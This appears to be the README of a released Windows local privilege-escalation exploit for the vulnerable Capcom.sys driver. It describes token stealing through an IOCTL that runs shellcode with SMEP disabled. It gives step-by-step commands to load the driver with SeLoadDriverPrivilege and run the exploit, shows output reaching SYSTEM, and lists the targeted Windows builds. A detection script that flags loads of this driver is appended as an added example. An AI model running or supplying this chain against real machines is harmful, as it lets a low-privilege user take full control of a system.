This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through an IOCTL and allows the attacker to execute an arbitrary function pointer with SMEP disabled. This exploit simply abuses the feature to perform token stealing to obtain SYSTEM privileges, and then executes a supplied command with elevated privileges.
For more details, see:
Load Capcom.sys first:

```
> eoploaddriver.exe System\CurrentControlSet\MyService C:\full\path\to\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
```
Then execute this exploit:

```
> ExploitCapcom.exe 'whoami'
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002247B9B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
```
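The loader output above shows two things a defender can key on: the driver image itself (its SHA1 is listed below) and a driver service registered under a user hive (`\Registry\User\<SID>\...`) instead of `\Registry\Machine`. The following detection helper is an added example, not part of this project; the record field names (`image`, `sha1`, `service_key`) and the sample records are assumptions constructed for illustration.

```python
"""Flag driver-load records matching the Capcom.sys loading pattern shown above.

Added example (not the project's code). Record fields are an assumed schema,
and SAMPLE_RECORDS are constructed, not real telemetry.
"""
import re

# SHA1 of the vulnerable Capcom.sys as listed in this README.
CAPCOM_SHA1 = "c1d5cf8c43e7679b782630e93f5e6420ca1749a7"

# Driver service key under a user hive (as the loader output shows) rather
# than under \Registry\Machine, where legitimate driver services live.
USER_HIVE_SERVICE = re.compile(
    r"^\\Registry\\User\\S-1-5-21(?:-\d+)+\\System\\CurrentControlSet\\",
    re.IGNORECASE,
)


def classify_driver_load(record):
    """Return the reasons a driver-load record looks like this loading chain."""
    reasons = []
    if record.get("sha1", "").lower() == CAPCOM_SHA1:
        reasons.append("known-vulnerable Capcom.sys image (SHA1 match)")
    if record.get("image", "").lower().endswith("\\capcom.sys"):
        # Name check catches copies whose hash differs (e.g. a re-signed build).
        reasons.append("image name Capcom.sys")
    if USER_HIVE_SERVICE.match(record.get("service_key", "")):
        reasons.append("driver service registered under a user hive key")
    return reasons


def scan(records):
    """Return (index, reasons) for every record that raised at least one reason."""
    hits = []
    for i, record in enumerate(records):
        reasons = classify_driver_load(record)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"image": r"C:\Windows\System32\drivers\tcpip.sys", "sha1": "0" * 40,
     "service_key": r"\Registry\Machine\System\CurrentControlSet\Services\Tcpip"},
    {"image": r"C:\full\path\to\Capcom.sys", "sha1": CAPCOM_SHA1.upper(),
     "service_key": r"\Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104"
                    r"\System\CurrentControlSet\MyService"},
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_RECORDS):
        print(f"record {index}: {'; '.join(reasons)}")
```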
Everything you may need is there.
- Capcom.sys (SHA1: c1d5cf8c43e7679b782630e93f5e6420ca1749a7)
- Windows 7 (x64) SP1 with Guest privileges
- Windows 10 (x64) Build 14393 with Guest privileges
This software is released under the MIT License, see LICENSE.